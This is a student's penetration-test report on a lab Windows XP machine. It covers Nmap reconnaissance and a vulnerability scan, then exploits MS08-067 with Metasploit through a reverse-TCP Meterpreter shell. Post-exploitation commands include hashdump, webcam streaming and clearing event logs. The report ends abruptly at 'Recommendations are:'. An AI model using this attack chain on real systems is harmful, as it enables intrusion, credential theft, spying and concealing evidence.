Vulnerability Assessment & Penetration Testing Report

on

Windows XP

vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.

Vulnerability Assessment & Penetration Testing on Windows XP project done by ICSS Student Prashant Kumar. Here discussed the full process below.

Project Name: Vulnerability Assessment & Penetration Testing on Windows XP

Author Name: Prashant Kumar

Publish Date: 24-07-2018

Introduction:

Vulnerability Assessment and Penetration Testing (VAPT) is a Systematic analysis of security status of Information systems. Vulnerability assessment is an on-demand solution which makes it convenient to run tests over the Internet anywhere, anytime. It is a hybrid solution which blends automated testing with security expert analysis. The unique technology identifies all possible attack vectors. Vulnerability assessment offers partial evaluation of vulnerabilities, actually testing for vulnerabilities done by penetrating barriers is useful adjunct. As it identifies potential access paths missed by VAS. Penetration testing aka “pen testing” is the practice of testing a computer system, network or Web application to find vulnerabilities that an attacker could exploit.

Vulnerability Assessment & Pen tests can be automated with software applications or they can be performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting back the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents done by Pen testers aka “Red Team”.

Life cycle of penetration testing:

Reconnaissance

Reconnaissance denotes the work of information gathering before any real attacks are planned. The idea is to collect as much interesting information as possible about the target. Reconnaissance is probably the longest phase, sometimes lasting weeks or months. But here we have a known target, a windows xp machine connected to same network as on us.to find the target machine we will run an Nmap scan.

After Nmap scan the live hosts are-

Now we need the os details of every system connected to the network so that we can find our target machine. So first we need to separate out the live ip address so we will save the above result in a text file and then filter the ip address using the command –

nmap -sV -sP 192.168.31.1-255 > livehosts.txt

cat host.txt | grep “for” | cut -d “ “ -f5 > ip.txt

The output is:

Now we have to check which one of them is a windows xp machine so we will run an script which will detect the os of all the live ip’s.

nmap -sV -O -iL ip.txt > osdetails.txt

And the output is:

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-23 02:06 IST Nmap scan report for XiaoQiang (192.168.31.1) Host is up (0.014s latency).

Not shown: 995 closed ports

*PORT*	*STATE SERVICE VERSION*
53/tcp	open domain dnsmasq 2.71
80/tcp	open http	nginx
8192/tcp open http		Tengine httpd
8193/tcp open http		nginx

8899/tcp open http Tengine httpd

MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.60%E=4%D=7/23%OT=53%CT=1%CU=41503%PV=Y%DS=1 %DC=D%G=Y%M=7811DC%T

OS:M=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)

OS:SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%TS=7)OPS(O1=M5B4ST11NW 7%O2=M5B4ST11NW7%O3

OS:=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6= M5B4ST11)WIN(W1=3890%W2=3

OS:890%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T =40%W=3908%O=M5B4NNSNW

OS:7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%F=AS%RD=0%Q=)T2 (R=N)T3(R=N)T4(R=Y%DF

OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=4 0%W=0%S=Z%A=S+%F=AR%O=

OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 %Q=)T7(R=N)U1(R=Y%DF=N%

OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G )IE(R=Y%DFI=N%T=40%CD

OS:=S)

Network Distance: 1 hop

Nmap scan report for 192.168.31.27

Host is up (0.016s latency).

Not shown: 999 closed ports

PORT STATE SERVICE VERSION

62078/tcp open tcpwrapped

MAC Address: 88:19:08:C9:D6:A8 (Unknown)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.60%E=4%D=7/23%OT=62078%CT=1%CU=31349%PV=Y% DS=1%DC=D%G=Y%M=88190

OS:8%TM=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=RD%TS

OS:=A)OPS(O1=M5B4NW6NNT11SLL%O2=M5B4NW6NNT11SLL%O3=M 5B4NW6NNT11%O4=M5B4NW6N

OS:NT11SLL%O5=M5B4NW6NNT11SLL%O6=M5B4NNT11SLL)WIN(W1= FFFF%W2=FFFF%W3=FFFF%W

OS:4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M 5B4NW6SLL%CC=Y%Q=)T1(

OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4( R=Y%DF=Y%T=40%W=0%S

OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A= S+%F=AR%O=%RD=0%Q=)T6(R

OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF= N%T=40%W=0%S=Z%A=S%F=A

OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=38%UN=0%RIPL=G%RI D=G%RIPCK=G%RUCK=0%RU

OS:D=G)IE(R=Y%DFI=S%T=40%CD=S)

Network Distance: 1 hop

Nmap scan report for 192.168.31.224

Host is up (0.00062s latency).

Not shown: 996 closed ports

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

MAC Address: 00:0C:29:BE:B1:2B (VMware)

Device type: general purpose

Running: Microsoft Windows XP|2003

OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003

OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003

Network Distance: 1 hop

Service Info: OSs: Windows, Windows XP; CPE:

cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Nmap scan report for 192.168.31.44

Host is up (0.000017s latency).

Not shown: 999 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.10 – 4.1

Network Distance: 0 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 6 IP addresses (4 hosts up) scanned in 261.30 seconds.

After analyzing the machine details the machine details in green font is our target machine. Now as we have identified our target we will move to next part.

Vulnerability scanning

In this part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerability in the system.

nmap -Pn –script vuln 192.168.31.224 > vuln.txt

The output is :

The above picture shows the list of vulnerabilities and they are as follows:

|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

This vulnerability exist but it doesn’t provide any user access so it can’t be used. The next one is,

smb-vuln-ms08-067

This vulnerability allows user to have remote access to the target system and it exist on windows xp 2003 machine which is our target.

Then the last one listed is

smb-vuln-ms17-010

This vulnerability also allows users to have remote access to the target system but it is not available for the windows xp 2003 machine it only exists in windows servers.

So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.

Attack & Penetration

Now as we know the vulnerability, we will search this in Metasploit framework database. Metasploit framework has a huge collection of exploits, payloads and modules which are used by the hacking community. So it can launched by typing msfconsole in the terminal.

Now we have search for the ms08_067 vulnerability. So we will type

search ms08_067

The description of this module is:

This module is used by following command.

use exploit/windows/smb/ms08_067_netapi

Now the following commands are used to see the payloads 0f this module and setting one of them as our requirement.

show payloads

We are going to use ‘windows/meterpreter/reverse_tcp’ payload.

set payload windows/meterpreter/reverse_tcp

show options

set rhost 192.168.31.224 (target ip address)

set lhost 192.168.31.44 (attacker ip address)

Now to get a access session with the target machine exploit command is used.

Post exploitation

Once we get a meterpreter session we have the full access of the target machine. we can do anything we want like we can escalate privilege by the command-

Getsystem

To confirm check the ip by command-

ipconfig

The following picture shows that-

We can see the options by typing help. Some common commands are:

sysinfo

getuid

hashdump

webcam_stream (If the target machine has a webcam)

download

pwd

reboot

When our task is completed. No longer need of the target machine we need to clear our footprints using command –

clearev

Conclusion & Recommendations

After reviewing the vulnerability and getting access of the system is a big security threat. Our data can be misused. So machine should be kept safe from such things.

This particular vulnerability was patched and released by the Microsoft a long ago so just perform a windows update and this vulnerability will automatically disappear.

Recommendations are: